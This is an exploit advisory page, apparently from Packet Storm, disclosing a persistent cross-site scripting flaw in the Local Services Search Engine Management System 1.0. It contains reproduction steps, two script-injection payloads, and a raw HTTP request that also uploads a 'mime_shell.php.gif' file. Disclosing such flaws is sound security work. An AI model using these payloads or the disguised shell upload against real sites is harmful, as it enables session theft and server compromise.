Local Services Search Engine Management System (LSSMES) version 1.0 suffers from a persistent cross site scripting vulnerability.
d2a656daa6da87d166260171488de8ddac70875aa62edb40b341a7dcc542c431# Exploit Title: Local Services Search Engine Management System (LSSMES) 1.0 - 'name' Persistent Cross-Site Scripting (XSS)
# Date: 2021-03-03
# Exploit Author: Tushar Vaidya
# Vendor Homepage: https://phpgurukul.com/local-services-search-engine-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10867
# Version: v1.0
# Tested on: Ubuntu
*Steps to Reproduce:*
1) Login with Admin Credentials and click on the *Person List* button.
2) Click on the *Add Person* button.
3) Now add the 'Ba1man' in the input field of *Name* and 'Ba2man' in the input field of *Address *then intercept it with Burp Suite.
4) Now add the following payload input field of *Name & Address*.
Payload 1: ba1man"></td><script>alert(document.cookie)</script>
Payload 2: ba2man"></td><script>alert(document.URL)</script>
4) Click On Add
5) Now go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
6) XSS payload is triggered.
7) Secondly, go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
8) Again XSS payload is triggered
*Proof-of-concept:*
1) Vulnerable Form Request:
POST /LSSMES/lssems/admin/add-person.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101
Firefox/86.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------366892106534365372313887502624
Content-Length: 1110
Origin: http:// localhost
Connection: close
Referer: http:// localhost /LSSMES/lssems/admin/add-person.php
Cookie: PHPSESSID=rinoskt58u1hpa8s6i7di53rbc
Upgrade-Insecure-Requests: 1
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="category"
3
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="name"
*ba1man"></td><script>alert(document.cookie)</script>*
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="propic"; filename="mime_shell.php.gif"
Content-Type: image/gif
GIF8;
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="mobilenumber"
8524697125
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="address"
*ba1man"></td><script>alert(document.URL)</script>*
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="city"
-----------------------------366892106534365372313887502624
Content-Disposition: form-data; name="submit"
-----------------------------366892106534365372313887502624--
2.1) Response:
Go to http://localhost/LSSMES/lssems/view-category-detail.php?viewid=3
Note: XSS from name parameter
2.2) Response:
Go to http://localhost/LSSMES/lssems/single-person-detail.php?viewid=25
Note: XSS from address parameter
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed